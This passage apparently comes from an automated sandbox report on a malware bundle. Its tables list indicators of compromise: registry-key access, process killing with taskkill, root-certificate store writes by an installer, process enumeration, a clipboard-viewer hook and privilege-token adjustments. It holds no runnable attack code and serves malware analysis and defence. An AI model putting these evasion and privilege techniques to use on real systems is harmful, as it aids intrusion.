Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	rundll32.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1656 taskkill.exe
6084 taskkill.exe
11204 taskkill.exe

pid	process
1656	taskkill.exe
6084	taskkill.exe
11204	taskkill.exe

Modifies data under HKEY_USERS 40 IoCs

Processes:

sihclient.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

installer.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

WerFault.exeWerFault.exepowershell.exeWerFault.exeWerFault.exerundll32.exeWerFault.exesetup_2.tmpWerFault.exe3155661.exe7570742.exe4089607.exeWerFault.exesNOldKfrjNE4mmfOTLZWB4RK.exeWerFault.exeultramediaburner.tmpWerFault.exe1018857.exeWerFault.exe4132860.exe5lf4wMbH4mC3Lxf2JAoQ37rC.exeXydisagavi.exe

pid	process
2472	WerFault.exe
2472	WerFault.exe
2416	WerFault.exe
2416	WerFault.exe
476	powershell.exe
476	powershell.exe
2384	WerFault.exe
2384	WerFault.exe
5128	WerFault.exe
5128	WerFault.exe
2904	rundll32.exe
2904	rundll32.exe
476	powershell.exe
476	powershell.exe
5664	WerFault.exe
5664	WerFault.exe
5536	setup_2.tmp
5536	setup_2.tmp
5824	WerFault.exe
5824	WerFault.exe
3800	3155661.exe
3800	3155661.exe
5268	7570742.exe
5268	7570742.exe
5524	4089607.exe
5524	4089607.exe
5196	WerFault.exe
5196	WerFault.exe
344	sNOldKfrjNE4mmfOTLZWB4RK.exe
344	sNOldKfrjNE4mmfOTLZWB4RK.exe
1732	WerFault.exe
1732	WerFault.exe
5336	ultramediaburner.tmp
5336	ultramediaburner.tmp
1692	WerFault.exe
1692	WerFault.exe
4452	1018857.exe
4452	1018857.exe
1212	WerFault.exe
1212	WerFault.exe
452	4132860.exe
452	4132860.exe
6052	5lf4wMbH4mC3Lxf2JAoQ37rC.exe
6052	5lf4wMbH4mC3Lxf2JAoQ37rC.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe
5552	Xydisagavi.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

WinHoster.exe

pid process

5888 WinHoster.exe

pid	process
5888	WinHoster.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Fri155442fc38b.exeFri1553f0ee90.exeWerFault.exepowershell.exe3155661.exe2.exePublicDwlBrowser1100.exeBearVpn 3.exe4089607.exe7570742.exe3069781.exezab2our.exe4132860.exe1018857.exe5486143.exe5lf4wMbH4mC3Lxf2JAoQ37rC.exeXydisagavi.exeGizhushadugu.exeChrome 5.exemsiexec.exeinstaller.exe

description	pid	process
Token: SeDebugPrivilege	3232	Fri155442fc38b.exe
Token: SeDebugPrivilege	1164	Fri1553f0ee90.exe
Token: SeRestorePrivilege	2416	WerFault.exe
Token: SeBackupPrivilege	2416	WerFault.exe
Token: SeBackupPrivilege	2416	WerFault.exe
Token: SeDebugPrivilege	476	powershell.exe
Token: SeDebugPrivilege	3800	3155661.exe
Token: SeDebugPrivilege	1164	2.exe
Token: SeDebugPrivilege	4460	PublicDwlBrowser1100.exe
Token: SeDebugPrivilege	5192	BearVpn 3.exe
Token: SeDebugPrivilege	5524	4089607.exe
Token: SeDebugPrivilege	5268	7570742.exe
Token: SeDebugPrivilege	1732	3069781.exe
Token: SeDebugPrivilege	3184	zab2our.exe
Token: SeDebugPrivilege	452	4132860.exe
Token: SeDebugPrivilege	4452	1018857.exe
Token: SeIncreaseQuotaPrivilege	476	powershell.exe
Token: SeSecurityPrivilege	476	powershell.exe
Token: SeTakeOwnershipPrivilege	476	powershell.exe
Token: SeLoadDriverPrivilege	476	powershell.exe
Token: SeSystemProfilePrivilege	476	powershell.exe
Token: SeSystemtimePrivilege	476	powershell.exe
Token: SeProfSingleProcessPrivilege	476	powershell.exe
Token: SeIncBasePriorityPrivilege	476	powershell.exe
Token: SeCreatePagefilePrivilege	476	powershell.exe
Token: SeBackupPrivilege	476	powershell.exe
Token: SeRestorePrivilege	476	powershell.exe
Token: SeShutdownPrivilege	476	powershell.exe
Token: SeDebugPrivilege	476	powershell.exe
Token: SeSystemEnvironmentPrivilege	476	powershell.exe
Token: SeRemoteShutdownPrivilege	476	powershell.exe
Token: SeUndockPrivilege	476	powershell.exe
Token: SeManageVolumePrivilege	476	powershell.exe
Token: 33	476	powershell.exe
Token: 34	476	powershell.exe
Token: 35	476	powershell.exe
Token: 36	476	powershell.exe
Token: SeDebugPrivilege	5724	5486143.exe
Token: SeDebugPrivilege	6052	5lf4wMbH4mC3Lxf2JAoQ37rC.exe
Token: SeDebugPrivilege	5552	Xydisagavi.exe
Token: SeDebugPrivilege	4000	Gizhushadugu.exe
Token: SeDebugPrivilege	3964	Chrome 5.exe
Token: SeSecurityPrivilege	1660	msiexec.exe
Token: SeCreateTokenPrivilege	4356	installer.exe
Token: SeAssignPrimaryTokenPrivilege	4356	installer.exe
Token: SeLockMemoryPrivilege	4356	installer.exe
Token: SeIncreaseQuotaPrivilege	4356	installer.exe
Token: SeMachineAccountPrivilege	4356	installer.exe
